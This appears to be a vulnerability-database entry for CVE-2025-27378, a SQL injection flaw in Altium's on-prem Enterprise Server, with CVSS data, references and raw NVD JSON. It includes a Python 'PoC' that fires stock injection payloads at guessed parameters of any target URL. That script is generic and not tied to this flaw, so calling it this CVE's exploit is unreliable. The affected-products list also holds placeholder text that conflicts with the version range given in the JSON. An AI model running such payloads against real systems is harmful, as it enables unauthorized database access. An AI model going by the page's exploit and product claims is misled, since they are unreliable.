CVE-2025-27378

Description

AES contains a SQL injection vulnerability due to an inactive configuration that prevents the latest SQL parsing logic from being applied. When this configuration is not enabled, crafted input may be improperly handled, allowing attackers to inject and execute arbitrary SQL queries.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:altium:on-prem_enterprise_server:*:*:*:*:*:*:*:* - VULNERABLE

Altium AES < 已修复版本

Altium Designer (使用AES模块的版本)

所有未启用最新SQL解析配置的Altium产品版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-27378 SQL Injection PoC
# Target: Altium AES
# Vulnerability: SQL Injection due to inactive SQL parsing configuration

import requests
import sys

def test_sql_injection(url):
    """Test for SQL injection vulnerability in Altium AES"""
    
    # Basic payload to test for SQL injection
    payloads = [
        "' OR '1'='1",
        "' OR '1'='1' --",
        "' UNION SELECT NULL--",
        "' AND SLEEP(5)--",
        "admin'--"
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    print(f"[*] Testing target: {url}")
    print(f"[*] Total payloads to test: {len(payloads)}\n")
    
    for i, payload in enumerate(payloads, 1):
        print(f"[*] Testing payload {i}/{len(payloads)}: {payload}")
        
        # Test in common parameter names
        params = ['username', 'email', 'id', 'query', 'search', 'input']
        
        for param in params:
            data = {param: payload}
            
            try:
                response = requests.post(url, data=data, headers=headers, timeout=10)
                
                # Check for SQL error indicators
                sql_errors = [
                    'sql syntax', 'mysql_', 'postgresql', 'ora-', 
                    'microsoft sql', 'sqlite_', 'syntax error',
                    'unclosed quotation', 'odbc driver'
                ]
                
                response_lower = response.text.lower()
                
                for error in sql_errors:
                    if error in response_lower:
                        print(f"[!] VULNERABLE! SQL error detected with param '{param}'")
                        print(f"[!] Error indicator: {error}")
                        print(f"[+] Response length: {len(response.text)}")
                        return True
                        
            except requests.exceptions.RequestException as e:
                print(f"[!] Request error: {e}")
                
        print(f"[*] Payload {i} test complete\n")
        
    print("[*] Testing complete. No obvious SQL injection detected.")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-27378.py <target_url>")
        print("Example: python cve-2025-27378.py http://target.com/endpoint")
        sys.exit(1)
        
    target_url = sys.argv[1]
    test_sql_injection(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27378
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27378
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27378/
[4] VulDB https://vuldb.com/cve/CVE-2025-27378
[5] https://www.altium.com/platform/security-compliance/security-advisories

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27378", "sourceIdentifier": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "published": "2026-01-22T01:15:51.077", "lastModified": "2026-02-26T21:25:32.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AES contains a SQL injection vulnerability due to an inactive configuration that prevents the latest SQL parsing logic from being applied. When this configuration is not enabled, crafted input may be improperly handled, allowing attackers to inject and execute arbitrary SQL queries."}, {"lang": "es", "value": "AES contiene una vulnerabilidad de inyección SQL debido a una configuración inactiva que impide que se aplique la lógica de análisis SQL más reciente. Cuando esta configuración no está habilitada, la entrada manipulada puede ser manejada incorrectamente, permitiendo a los atacantes inyectar y ejecutar consultas SQL arbitrarias."}], "metrics": {"cvssMetricV31": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:altium:on-prem_enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.3", "versionEndExcluding": "7.0.6", "matchCriteriaId": "3F31D6A7-989F-4647-AA13-38737112E369"}]}]}], "references": [{"url": "https://www.altium.com/platform/security-compliance/security-advisories", "source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "tags": ["Vendor Advisory"]}]}}